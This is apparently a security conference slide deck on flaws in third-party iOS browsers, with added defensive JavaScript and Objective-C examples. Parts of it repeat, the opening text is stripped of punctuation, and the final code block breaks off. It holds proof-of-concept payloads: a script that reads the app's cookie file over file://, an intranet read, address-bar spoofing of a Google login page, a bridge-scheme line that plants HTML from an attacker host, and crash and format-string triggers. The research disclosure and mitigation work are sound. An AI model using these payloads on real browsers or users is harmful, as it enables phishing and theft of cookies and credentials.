bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Type
• text/plain rendered as HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream rendered as HTML
• application/other (any other type) with an .html filename rendered as HTML
Only the declared type should decide whether a response is parsed as HTML; neither the body nor the filename.
JS without Same-Origin Policy
Read the application's cookie store when the page runs from file:// (the five path components a[3]…a[7] are assumed to be those of the app container, e.g. private/var/mobile/Applications/<UUID>):
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  // rebuild the container path from the document's own file:// URL
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest();
  x.open('GET', path, false);   // synchronous, same "origin" as any other file
  x.send();
  alert(x.responseText);
}
</script>
Reach internal hosts from a page that has no origin restrictions at all:
<script>
x = new XMLHttpRequest();
x.open('GET', 'https://your.intranet/', false);
x.send();
alert(x.responseText);
</script>
Challenge: hijack password autofill
Opening local HTML files safely
• Open them as text/plain
• Content-Security-Policy header / HTML5 sandbox
• baseURL = about:blank (never nil)
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
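The Content-Type, Content-Disposition and local-file rules from the last three slides collected into one policy function, as an added example that is not part of the slides or of any browser's code. It decides how a fetched response is presented before the WebView gets it. The function names, return shape and the constructed headers in the test are assumptions.

```javascript
// Added example (not from the slides): a policy function a WebView-based
// browser could apply to a fetched response before handing it to the
// rendering engine. Rules from the slides: only a declared HTML type is
// rendered as HTML (no sniffing of text/plain or application/octet-stream
// bodies, no trust in an .html filename); Content-Disposition: attachment
// and local file:// documents never run with the hosting site's origin or
// with script. Names are hypothetical.

// "text/plain; charset=utf-8" -> { type: 'text/plain', params: { charset: 'utf-8' } }
function parseHeaderValue(value) {
  const [type, ...rest] = value.split(';').map(s => s.trim());
  const params = {};
  for (const p of rest) {
    const i = p.indexOf('=');
    if (i > 0) params[p.slice(0, i).trim().toLowerCase()] = p.slice(i + 1).trim().replace(/^"|"$/g, '');
  }
  return { type: type.toLowerCase(), params };
}

// Case-insensitive header lookup; null when absent.
function header(headers, name) {
  const key = Object.keys(headers).find(k => k.toLowerCase() === name.toLowerCase());
  return key === undefined ? null : headers[key];
}

const HTML_TYPES = new Set(['text/html', 'application/xhtml+xml']);

// Decide how to present the response for `url`.
// render:   'html' | 'text' | 'download'
// isolated: true when the document must not get the hosting site's origin
//           (for UIWebView: load it with baseURL about:blank, never nil)
// script:   whether JavaScript may run in it
function presentation(url, headers) {
  const isLocal = new URL(url).protocol === 'file:';
  const ct = parseHeaderValue(header(headers, 'Content-Type') || 'application/octet-stream');
  const cd = header(headers, 'Content-Disposition');
  const attachment = cd !== null && parseHeaderValue(cd).type === 'attachment';
  const isHtml = HTML_TYPES.has(ct.type);       // filename and body are ignored
  const isolated = attachment || isLocal;

  let render;
  if (isHtml) render = 'html';
  else if (ct.type.startsWith('text/')) render = 'text';
  else render = 'download';

  return { render, isolated, script: isHtml && !isolated };
}
```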
Popups & URL handling
Popup blockers
• Application (bolted-on): browsers that rewrite the href attribute of target=_blank links can usually be tricked into believing the navigation was initiated by the user
• Native (WebKit): <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. hand the URL to another registered app and bypass all popup blockers anyway…

URI schemes
• Bridge (internal): schemes the browser registers for its own JavaScript-to-native bridge, reachable from any web page, e.g.
  scheme://download?https://secure.tld/victim/data
  scheme://download?http://attacker.tld/README.html
  scheme://add-filter?url=
  (fetch the victim's authenticated data, or plant attacker HTML that is later opened from file://)
• Registered (external): schemes of other installed apps
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will dereference a null pointer; CFURLCreateWithString returns NULL for a string it rejects, and a browser that does not check the result passes that NULL on
• Tested with percent-encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>

Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
• Special guest star: Safari on OS X Mavericks before Security Update 2014-002 (CVE-2014-1315, a format string issue in the handling of URLs)
  <iframe src="lets-try-format-string:%p%p%p%p…">
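The URI-scheme and CFURL material above, as an added example that is not code from the slides or from any browser discussed: the checks a WebView-based browser can run in its shouldStartLoadWithRequest: equivalent before a URL reaches either its own bridge or native URL code. The `scheme:` prefix, the internal origin, the command names and the `initiatorOrigin` parameter are hypothetical stand-ins.

```javascript
// Added example (not from the slides): route one navigation request before
// it reaches the app's bridge (scheme://download?..., scheme://add-filter?...)
// or native CFURL code. Scheme, origin and command names are hypothetical.

const BRIDGE_SCHEME = 'scheme:';                   // hypothetical internal scheme
const INTERNAL_ORIGIN = 'browser-internal://ui';   // hypothetical origin of the app's own UI pages
const BRIDGE_COMMANDS = new Set(['download', 'add-filter']);

// Every '%' must begin a two-hex-digit escape. This catches http://% and
// http://%5; http://%5c (an encoded backslash in the host) is well formed
// here and is caught by the parser step below instead.
function hasValidPercentEncoding(href) {
  return !/%(?![0-9A-Fa-f]{2})/.test(href);
}

// `initiatorOrigin` is the origin of the document that triggered the
// navigation, taken from the WebView's own state (its main document URL),
// never from a value the page reports about itself.
// Returns { action: 'load' | 'bridge' | 'external' | 'reject', ... }
function routeNavigation(href, initiatorOrigin) {
  if (!hasValidPercentEncoding(href)) {
    return { action: 'reject', reason: 'malformed percent-encoding' };
  }
  let u;
  try { u = new URL(href); } catch (e) {
    // Anything a strict parser refuses is what CFURLCreateWithString() turns
    // into NULL; rejecting it here keeps the NULL away from CFURLCopyPath().
    return { action: 'reject', reason: 'unparsable URL' };
  }
  if (u.protocol === BRIDGE_SCHEME) {
    // Bridge commands are honoured only from the browser's own UI pages.
    // From web content, <iframe src="scheme://download?https://secure.tld/victim/data">
    // would fetch the victim's authenticated data, and
    // scheme://download?http://attacker.tld/README.html would plant HTML
    // that is later opened from file://.
    if (initiatorOrigin !== INTERNAL_ORIGIN) {
      return { action: 'reject', reason: 'bridge command from web content' };
    }
    if (!BRIDGE_COMMANDS.has(u.hostname)) {
      return { action: 'reject', reason: 'unknown bridge command' };
    }
    return { action: 'bridge', command: u.hostname, argument: u.search.slice(1) };
  }
  if (u.protocol === 'http:' || u.protocol === 'https:') {
    return { action: 'load', href: u.href };
  }
  // Any other registered scheme (googlechrome:, merc:, ...) hands control to
  // another app. It is not a popup, so no popup blocker sees it: the caller
  // should require a user gesture and never follow it from a frame.
  return { action: 'external', scheme: u.protocol };
}
```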
SSL & password managers
SSL
• By default, invalid certificates on UIWebView https requests are rejected without user interaction
• This can be changed (e.g. to allow a user to accept a self-signed cert), after which validating every connection is the browser's own job
• 14% of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main document's domain only, not for subresources and subframes (e.g. Opera Coast < 3.0.2)
Password managers
• Bridge JavaScript runs with the privileges of the top frame -> passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with or without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
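The password-manager points above, as an added example that is not part of the slides or of any browser's code: the match a bolted-on password manager should require before filling or saving. It keys credentials on the full origin rather than the domain, fills only in the top frame, and saves only under the origin the form was actually submitted from. The store layout, the page descriptor and the `hasOnlySecureContent` field (named after the WKWebView property) are assumptions.

```javascript
// Added example (not from the slides): origin-keyed fill and save decisions
// for a bolted-on password manager. Store entries and page descriptors are
// constructed; `hasOnlySecureContent` mirrors the WKWebView property of that
// name (UIWebView offers nothing comparable). Names are hypothetical.

// Key under which credentials are stored: the WHATWG origin, so that
// http://accounts.example.com and https://accounts.example.com differ.
function storageKey(href) {
  let u;
  try { u = new URL(href); } catch (e) { return null; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  return u.origin;
}

// page = { url, isTopFrame, hasOnlySecureContent }
// Returns the matching entry, or null when nothing may be filled.
function credentialsFor(store, page) {
  if (!page.isTopFrame) return null;          // the bridge has top-frame privileges only
  const key = storageKey(page.url);
  if (key === null) return null;
  // Design choice: on https, refuse to fill into a page that mixes in
  // insecure content or sits behind a certificate the user overrode; the
  // form is then readable by whoever controls the network.
  if (key.startsWith('https:') && !page.hasOnlySecureContent) return null;
  return store.find(e => e.origin === key) || null;
}

// Save under the origin of the top-frame document the form was submitted
// from, never under a domain named by the form's action, a redirect target
// or a value supplied by page script, and only after explicit confirmation.
function saveCredential(store, page, username, password, userConfirmed) {
  if (!page.isTopFrame || !userConfirmed) return false;
  const key = storageKey(page.url);
  if (key === null) return false;
  store.push({ origin: key, username, password });
  return true;
}
```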
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://iosbrowsr-tests.com/
Questions?
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
Bolted-on by the browsers
• Address bar
• Multiple tabs
• Downloads
• Support for untrusted SSL certificates
• Autocomplete & password manager
• … and many more features (safety ratings, malware protection, cloud integration, …)
Testing
• Inspiration from the Browser Security Handbook
• Retesting previous Mobile Safari bugs
• "Black-box" testing from the web perspective, review of JavaScript code, a bit of reversing, debugging
• Cross-browser test cases: https://ios.browsr-tests.com
In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers
Address Bar Spoofing
• Look-alike: IDN etc.
• URL tracking desynchronization:
  • Navigate to untracked content
  • Initiate navigation, interrupt, overwrite content
  • Failed navigation
  • Loading loop
  • Lots of other methods (race conditions, history, …)
  • Most of them known for over 10 years (IE, Netscape)
Address Bar Spoofing: Untracked Content
Replace window content with untracked content; document.write and/or data: URIs are usually good candidates.
• w = window.open('https://accounts.google.com'); setTimeout(function() { w.document.write(…) }, …)
• CVE-2013-5152: Mobile Safari Address Bar Spoofing, reported in iOS 5.1.1, fixed in iOS 7
Address Bar Spoofing: Init & Interrupt
Initialise a window with the target URL, then replace it with phishing content before the target loads.
• w = window.open('https://accounts.google.com'); w.document.write(…)
Optionally fall back to the native window.open (deleting the browser's JavaScript override restores WebKit's own implementation):
• delete window.open; w = window.open('https://accounts.google.com'); w.document.write(…)
Affected:
• CVE-2013-6895: Kaspersky Safe Browser
• CVE-2013-6898: F-Secure Safe Browser
• CVE-2013-6897: Dolphin Browser
• … and 45 of the tested browsers
• Special guest star: Google Chrome for Android, CVE-2013-6642
Bug Bounty :-)
Address Bar Spoofing: Failed Navigation
An incorrect URL often remains in the address bar after navigation errors:
• DNS NXDOMAIN - host not found (https://login.target.tld)
• TCP port closed (https://www.target.tld:448)
• SSL errors (https://target.tld)
• Display the phishing page, then redirect to the "incorrect" URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing the error alerts
Address Bar Spoofing: Loading loop
• The HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• The address bar in Mobile Safari and many other iOS browsers is updated on the navigation attempt, even before an actual connection is made
• Now we only need to find a target with a filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL
• document.write('Phishing page here'); location = 'https://accounts.google.com:8443'; setInterval(function() { location = 'https://accounts.google.com:8443' }, …)
Address Bar Spoofing: Title bar
Phishing page with the spoofed URL placed in the title bar: <title>https://www.apple.com</title>
Address bar tips
• Display the URL that is currently loaded within the UIWebView, not the one you think will be there
• UIWebViewDelegate: update the address bar on each event, including webView:didFailLoadWithError:
• Displaying an SSL lock only makes sense if there was an actual, successful and valid SSL connection. Spoofing an https URL seems easy; don't make it worse by automatically adding the SSL lock
• iOS 8: KVO-compliant WKWebView URL property
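The address-bar tips above, as an added Objective-C example that is not code from the talk: a UIWebViewDelegate that resynchronises the address field with what the web view has actually committed on every callback (including the failure callback), and the iOS 8 KVO equivalent for WKWebView. Class names, the address field and the lock icon are assumptions.

```objectivec
// Added example, not code from the talk. ARC; class, property and outlet names are
// hypothetical. Invariant: the address field shows only a URL the web view has actually
// finished loading, and the lock appears only after a finished https load.
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

@interface AddressBarController : NSObject <UIWebViewDelegate>
@property (nonatomic, weak) UITextField *addressField;   // hypothetical address bar
@property (nonatomic, weak) UIImageView *lockIcon;        // hypothetical SSL lock
@property (nonatomic, strong) NSURL *committedURL;        // last URL that finished loading
@end

@implementation AddressBarController

- (void)showURL:(NSURL *)url secure:(BOOL)secure {
    self.addressField.text = url.absoluteString ?: @"";
    self.lockIcon.hidden = !secure;
}

// Do not touch the address bar here: no connection has been attempted yet and the
// request may never complete (the loading-loop spoof depends on exactly that).
- (BOOL)webView:(UIWebView *)webView shouldStartLoadWithRequest:(NSURLRequest *)request
                                                  navigationType:(UIWebViewNavigationType)navigationType {
    return YES;
}

// A load is in flight: what is on screen is still the committed page, but the lock
// goes away because that page may be replaced by anything.
- (void)webViewDidStartLoad:(UIWebView *)webView {
    [self showURL:self.committedURL secure:NO];
}

// Only a finished load moves the address bar. mainDocumentURL ignores subframe loads,
// which also fire this callback. UIWebView has already rejected invalid certificates
// (unless the app overrode that elsewhere), so https here means a valid connection.
- (void)webViewDidFinishLoad:(UIWebView *)webView {
    NSURL *url = webView.request.mainDocumentURL ?: webView.request.URL;
    self.committedURL = url;
    BOOL https = [url.scheme.lowercaseString isEqualToString:@"https"];
    [self showURL:url secure:https];
}

// The failure case from the slide: resynchronise instead of leaving the attempted URL
// in the bar above content that never came from it.
- (void)webView:(UIWebView *)webView didFailLoadWithError:(NSError *)error {
    [self showURL:self.committedURL secure:NO];
}
@end

// iOS 8: WKWebView exposes URL, loading and hasOnlySecureContent as KVO-compliant
// properties, so the address bar can follow the engine's own notion of the page.
@interface WKAddressBarObserver : NSObject
@property (nonatomic, weak) UITextField *addressField;
@property (nonatomic, weak) UIImageView *lockIcon;
- (instancetype)initWithWebView:(WKWebView *)webView;
@end

@implementation WKAddressBarObserver {
    WKWebView *_webView;
}
- (instancetype)initWithWebView:(WKWebView *)webView {
    if ((self = [super init])) {
        _webView = webView;
        for (NSString *key in @[@"URL", @"loading", @"hasOnlySecureContent"]) {
            [webView addObserver:self forKeyPath:key options:NSKeyValueObservingOptionNew context:NULL];
        }
    }
    return self;
}
- (void)observeValueForKeyPath:(NSString *)keyPath ofObject:(id)object
                        change:(NSDictionary *)change context:(void *)context {
    NSURL *url = _webView.URL;
    self.addressField.text = url.absoluteString ?: @"";
    BOOL https = [url.scheme.lowercaseString isEqualToString:@"https"];
    // Lock only for a finished https page whose subresources were all secure.
    self.lockIcon.hidden = !(https && !_webView.loading && _webView.hasOnlySecureContent);
}
- (void)dealloc {
    for (NSString *key in @[@"URL", @"loading", @"hasOnlySecureContent"]) {
        [_webView removeObserver:self forKeyPath:key];
    }
}
@end
```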
In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers
UXSS: Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website. (~ http://en.wikipedia.org/wiki/Cross-site_scripting)
Famous after the PDF UXSS in 2007.
Universal Cross-Site Scripting
• CVE-2013-6893: UXSS in Mercury Browser for iOS
• CVE-2013-7197: UXSS in Yandex.Browser for iOS
• CVE-2012-2899: UXSS in Google Chrome for iOS
• …
CVE-2013-6893: UXSS in Mercury Browser
w = window.open('about:blank')
  → bridge call: mbexec$(WINDOW_ID) [{"command": "window.open", "target": 1234, "url": "about:blank"}]  (target id from Math.random())
  → native: [webView loadRequest: … "about:blank" …]
w.document.write('Hi')
  → bridge call: mbexec$(WINDOW_ID) [{"command": "window.document.write", "target": 1234, "html": "Hi"}]
  → native: [webView stringByEvaluatingJavaScriptFromString: "document.write('Hi')"]
Cross-frame forgery: Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>') … and it just works in accounts.google.com
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() → UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file://: no same-origin policy, access to any web origin and to local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>') → applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL … "about:blank"]]
• iOS 8: use WKWebView and WKUIDelegate webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com…"] (a string NSURL cannot parse) —> nil
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com…"), NULL) —> NULL
• Downloads opened directly from file://
Content-Disposition: attachment
• Displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• Isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')
Content-Type
• text/plain → HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream → HTML
• application/other, filename *.html
JS without Same-Origin Policy
From a file:// document, the script rebuilds the application container path from its own URL and reads the app's cookie store:
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6];
path = path + '/Library/Cookies/Cookies.binarycookies';
x = new XMLHttpRequest(); x.open('GET', path, false); x.send(); alert(x.responseText);
</script>
The same origin can also read from any web origin:
<script>x = new XMLHttpRequest(); x.open('GET', 'https://your.intranet/', false); x.send(); alert(x.responseText);</script>
Challenge: hijack password autofill
Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
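The safe cross-tab document.write and the "opening local HTML files safely" list above, as one added Objective-C example that is not code from the talk: a tab manager whose new-tab and download paths never produce an applewebdata:// or file:// document. Class and method names are hypothetical.

```objectivec
// Added example, not code from the talk. ARC; TabManager and its methods are hypothetical.
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

static NSURL *AboutBlank(void) { return [NSURL URLWithString:@"about:blank"]; }

@interface TabManager : NSObject <WKUIDelegate>
- (UIWebView *)openTabWithHTML:(NSString *)html;
- (UIWebView *)openDownloadedFileAsText:(NSURL *)fileURL;
- (WKWebView *)openDownloadedFileInWKWebView:(NSURL *)fileURL;
@end

@implementation TabManager

// UIWebView: a cross-tab document.write() that arrived through the JS bridge.
// baseURL:nil would give the new document the applewebdata:// origin (CVE-2012-2899);
// a baseURL taken from the URL the page asked for would put attacker HTML in that
// URL's origin (the Mercury, Yandex and Chrome cases). about:blank gives it neither.
- (UIWebView *)openTabWithHTML:(NSString *)html {
    UIWebView *tab = [[UIWebView alloc] initWithFrame:CGRectZero];
    [tab loadHTMLString:(html ?: @"") baseURL:AboutBlank()];
    return tab;
}

// Downloaded HTML shown as text/plain: it is displayed, never parsed as markup, and
// it is not loaded from file:// so nothing inherits the file origin.
- (UIWebView *)openDownloadedFileAsText:(NSURL *)fileURL {
    NSData *data = [NSData dataWithContentsOfURL:fileURL] ?: [NSData data];
    UIWebView *tab = [[UIWebView alloc] initWithFrame:CGRectZero];
    [tab loadData:data MIMEType:@"text/plain" textEncodingName:@"utf-8" baseURL:AboutBlank()];
    return tab;
}

// iOS 8 WKWebView: render the download with script disabled and an about:blank base.
- (WKWebView *)openDownloadedFileInWKWebView:(NSURL *)fileURL {
    WKWebViewConfiguration *cfg = [[WKWebViewConfiguration alloc] init];
    cfg.preferences.javaScriptEnabled = NO;
    WKWebView *tab = [[WKWebView alloc] initWithFrame:CGRectZero configuration:cfg];
    NSString *html = [NSString stringWithContentsOfURL:fileURL
                                              encoding:NSUTF8StringEncoding
                                                 error:NULL];
    [tab loadHTMLString:(html ?: @"") baseURL:AboutBlank()];
    return tab;
}

// iOS 8 WKWebView: let WebKit implement window.open itself. The new view must be
// created with the configuration WebKit hands over, so the opener relationship and
// the same-origin policy are enforced by the engine, not by a bolted-on bridge.
- (WKWebView *)webView:(WKWebView *)webView
createWebViewWithConfiguration:(WKWebViewConfiguration *)configuration
   forNavigationAction:(WKNavigationAction *)navigationAction
        windowFeatures:(WKWindowFeatures *)windowFeatures {
    WKWebView *tab = [[WKWebView alloc] initWithFrame:webView.bounds configuration:configuration];
    tab.UIDelegate = self;
    // Hand `tab` to the tab UI here (hypothetical); WebKit loads navigationAction.request.
    return tab;
}
@end
```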
In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers
Popups & URL handling
Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…
URI schemes
• Native (WebKit)
• Application (bolted-on)
• Bridge (internal): scheme://download/https://secure.tld/victim/data, scheme://download/http://attacker.tld/README.html, scheme://add-filter?url=
• Registered (external)
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a null pointer dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>
Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
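The null-pointer pattern behind the Opera Coast trace above, as an added Objective-C example that is not from the talk: the unchecked shape, in which the NULL that CFURLCreateWithString returns for an unparseable string reaches CFURLCopyPath, beside the checked shape. Function names are hypothetical.

```objectivec
// Added example, not code from the talk. CFURLCreateWithString returns NULL for a
// string it cannot parse (the slide's "http://%5c" is one); unlike Objective-C nil,
// NULL passed to a CF function is dereferenced. Function names are hypothetical.
#import <Foundation/Foundation.h>

// Unchecked shape: a malformed URL string becomes a NULL CFURLRef and is passed on.
static NSString *PathOfURL_Unchecked(NSString *urlString) {
    CFURLRef url = CFURLCreateWithString(kCFAllocatorDefault,
                                         (__bridge CFStringRef)urlString, NULL);
    CFStringRef path = CFURLCopyPath(url);   // url == NULL -> EXC_BAD_ACCESS at 0x0
    CFRelease(url);
    return CFBridgingRelease(path);
}

// Checked shape: treat NULL as "not a URL" and fail the navigation cleanly.
static NSString *PathOfURL_Checked(NSString *urlString, NSError **error) {
    CFURLRef url = (urlString.length > 0)
        ? CFURLCreateWithString(kCFAllocatorDefault, (__bridge CFStringRef)urlString, NULL)
        : NULL;
    if (url == NULL) {
        if (error) *error = [NSError errorWithDomain:NSURLErrorDomain
                                                code:NSURLErrorBadURL
                                            userInfo:@{NSLocalizedDescriptionKey: @"malformed URL"}];
        return nil;
    }
    CFStringRef path = CFURLCopyPath(url);   // may also be NULL for a URL without a path
    CFRelease(url);
    return path ? CFBridgingRelease(path) : @"";
}
```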
• Special guest star: Safari on OS X Mavericks before Security Update 2014-002 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers
SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14 of the tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)
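The SSL points above, as an added Objective-C example that is not from the talk. UIWebView offers no TLS hook of its own, so the assumption here is that the browser routes its requests through an NSURLSession (behind a custom NSURLProtocol, as third-party browsers commonly do); this delegate then decides per host and per certificate whether an invalid chain may be accepted, never silently. Class and method names are hypothetical.

```objectivec
// Added example, not code from the talk. ARC; BrowserTLSPolicy is hypothetical.
#import <Foundation/Foundation.h>
#import <Security/Security.h>
#import <CommonCrypto/CommonDigest.h>

// Hex SHA-256 of the leaf certificate, so an exception is bound to one exact
// certificate and not merely to a hostname.
static NSString *LeafFingerprint(SecTrustRef trust) {
    SecCertificateRef leaf = SecTrustGetCertificateAtIndex(trust, 0);
    if (leaf == NULL) return nil;
    NSData *der = CFBridgingRelease(SecCertificateCopyData(leaf));
    unsigned char digest[CC_SHA256_DIGEST_LENGTH];
    CC_SHA256(der.bytes, (CC_LONG)der.length, digest);
    NSMutableString *hex = [NSMutableString stringWithCapacity:2 * CC_SHA256_DIGEST_LENGTH];
    for (int i = 0; i < CC_SHA256_DIGEST_LENGTH; i++) [hex appendFormat:@"%02x", digest[i]];
    return hex;
}

// Standard evaluation against the SSL policy already attached to the trust object
// (chain, expiry, and hostname match for this connection's host).
static BOOL TrustIsValid(SecTrustRef trust) {
    SecTrustResultType result = kSecTrustResultInvalid;
    if (SecTrustEvaluate(trust, &result) != errSecSuccess) return NO;
    return result == kSecTrustResultUnspecified || result == kSecTrustResultProceed;
}

@interface BrowserTLSPolicy : NSObject <NSURLSessionDelegate>
// host -> fingerprint of the certificate the user explicitly accepted for that host
@property (nonatomic, strong) NSMutableDictionary *userExceptions;
@end

@implementation BrowserTLSPolicy

- (instancetype)init {
    if ((self = [super init])) _userExceptions = [NSMutableDictionary dictionary];
    return self;
}

// Called by the UI after the user has seen the certificate error and chosen to proceed.
- (void)recordExceptionForHost:(NSString *)host trust:(SecTrustRef)trust {
    NSString *fp = LeafFingerprint(trust);
    if (host && fp) self.userExceptions[host.lowercaseString] = fp;
}

- (void)URLSession:(NSURLSession *)session
didReceiveChallenge:(NSURLAuthenticationChallenge *)challenge
 completionHandler:(void (^)(NSURLSessionAuthChallengeDisposition, NSURLCredential *))completionHandler {
    NSURLProtectionSpace *space = challenge.protectionSpace;
    if (![space.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust]) {
        completionHandler(NSURLSessionAuthChallengePerformDefaultHandling, nil);
        return;
    }
    SecTrustRef trust = space.serverTrust;
    if (TrustIsValid(trust)) {              // the normal case: nothing to decide
        completionHandler(NSURLSessionAuthChallengePerformDefaultHandling, nil);
        return;
    }
    // Invalid chain. The challenge names the host of *this* connection, so a subframe
    // or subresource on another host gets its own decision instead of inheriting the
    // main document's (the "main domain only" validation the slide describes).
    NSString *approved = self.userExceptions[space.host.lowercaseString];
    NSString *actual = LeafFingerprint(trust);
    if (approved && actual && [approved isEqualToString:actual]) {
        completionHandler(NSURLSessionAuthChallengeUseCredential,
                          [NSURLCredential credentialForTrust:trust]);
        return;
    }
    // No explicit exception for exactly this host and certificate: fail closed, as
    // UIWebView does by default. The UI may then offer recordExceptionForHost:trust:.
    completionHandler(NSURLSessionAuthChallengeCancelAuthenticationChallenge, nil);
}
@end
```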
Password managers
• JavaScript with the privileges of the top frame —> passwords not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
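The three password-manager points above, as an added Objective-C example (not from the talk) of the native side of a bolted-on password manager: the credential key is derived from the web view's own mainDocumentURL rather than from anything the injected script reports, and it includes the scheme and port. Class and method names, and the "store only https credentials" rule, are assumptions.

```objectivec
// Added example, not code from the talk. ARC; PasswordManagerPolicy is hypothetical.
#import <UIKit/UIKit.h>

// scheme + host + port: the unit the password manager keys on. Dropping the scheme
// is what lets an https credential be filled into an http page on the same host.
static NSString *CredentialKeyForURL(NSURL *url) {
    if (!url.scheme || !url.host) return nil;
    NSString *scheme = url.scheme.lowercaseString;
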